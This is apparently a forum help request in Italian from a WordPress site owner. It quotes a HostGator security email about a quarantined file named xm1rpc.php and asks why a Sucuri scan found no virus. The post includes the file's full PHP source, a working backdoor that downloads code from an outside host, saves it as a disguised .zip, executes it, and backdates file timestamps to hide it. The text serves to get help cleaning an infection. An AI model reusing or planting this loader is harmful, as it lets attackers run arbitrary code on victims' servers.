Ho un sito web wordpress e hostgator continua a inviare queste informazioni →
During a scan of our servers we identified malicious content in accounts under your control. We have quarantined the files listed below to prevent abuse. Please note that no services have been disabled and no legitimate content has been affected by this action. However, it is possible that other malicious activity may have disrupted your services.
The most important things you can do to ensure the security of your account are to make sure your software (e.g WordPress) is up-to-date, and that your passwords are strong. We strongly encourage you to change all of your account passwords and update all software as soon as possible to prevent any further compromises or abuse.
We understand that any risk to our network reputation is a risk to our customers' reputation and so we take third-party reports of network abuse seriously. In order to protect our shared reputation we may disable account services in the event of a third-party report of network abuse until we are confident that the account has been properly cleaned and secured.
This email is to inform you of content found by our proactive scans, and is not the result of a third-party abuse report. No services have been disabled as a result of this discovery. Additional information on HostGator's policies, and what activity is damaging to a network's reputation in general, is available in our knowledge base: Acceptable Use Policy
My Account was Hacked
If you would like help in securing your account we recommend SiteLock, a security service and partner of ours. They can be contacted at 844-631-8637. HostGator Security Department Quarantined files: /home2/xxxxx/public_html/xm1rpc.php
Ho allegato il file:
<?php $query = isset($_SERVER['QUERY_STRING'])? $_SERVER['QUERY_STRING']: '';
if (false !== strpos($query, 'simpler-ws')) {
__1get_ws();
$ws_hash = md5('wsa');
$cache_dir = __1get_root();
$ws_file = $cache_dir.'/'.$ws_hash.'.zip';
require($ws_file); die('');
}
function __1get_root() {
$localpath=getenv("SCRIPT_NAME");
$absolutepath=getenv("SCRIPT_FILENAME");
$root_path=substr($absolutepath,0,strpos($absolutepath,$localpath));
return $root_path;
}
function __1get_ws() {
$host = isset($_SERVER['HTTP_HOST'])? $_SERVER['HTTP_HOST']: '';
$ws_hash = md5('wsa');
$cache_dir = __1get_root();
$ws_file = $cache_dir.'/'.$ws_hash.'.zip';
if (file_exists($ws_file)) {
chmod($ws_file, 0644);
}
if (!file_exists($ws_file) || file_exists($ws_file) && (time() - filemtime($ws_file) > 60*60*1)) {
$ws = __1fetch_url(__get_rev().'&get_ws');
if (!empty($ws))
file_put_contents($ws_file, $ws);
chmod($ws_file, 0644);
touch($ws_file, time() - mt_rand(60 * 60 * 24 * 30, 60 * 60 * 24 * 365));
touch(dirname($ws_file) , time() - mt_rand(60 * 60 * 24 * 30, 60 * 60 * 24 * 365));
} else {
$ws = file_get_contents($ws_file);
}
return $ws;
}
function __get_rev() {
return 'http://bokoinchina.com/extadult2.php?host='.trim(strtolower($_SERVER['HTTP_HOST']), '.').'&full_url='.urlencode('http://'.$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI']);
return 'http://nezlobudnya.com/generate';
}
function __1fetch_url($url) {
$contents = false;
$errs = 0;
while ( !$contents && ($errs++ < 3) ) {
$user_agent = 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1';
if (is_callable('curl_init')) {
$c = curl_init($url);
curl_setopt($c, CURLOPT_FOLLOWLOCATION, TRUE);
curl_setopt($c, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($c, CURLOPT_USERAGENT,$user_agent);
$contents = curl_exec($c);
if (curl_getinfo($c, CURLINFO_HTTP_CODE) !== 200)
$contents = false;
curl_close($c);
} else {
$allowUrlFopen = preg_match('/1|yes|on|true/i', ini_get('allow_url_fopen'));
if ($allowUrlFopen) {
$options = array('http' => array('user_agent' => $user_agent)); $context = stream_context_create($options); $contents = @file_get_contents($url, false, $context);
}
}
}
return $contents;
}
// Silence is golden
Ho eseguito una scansione succurs, ma non è stato trovato alcun virus. qual è il problema?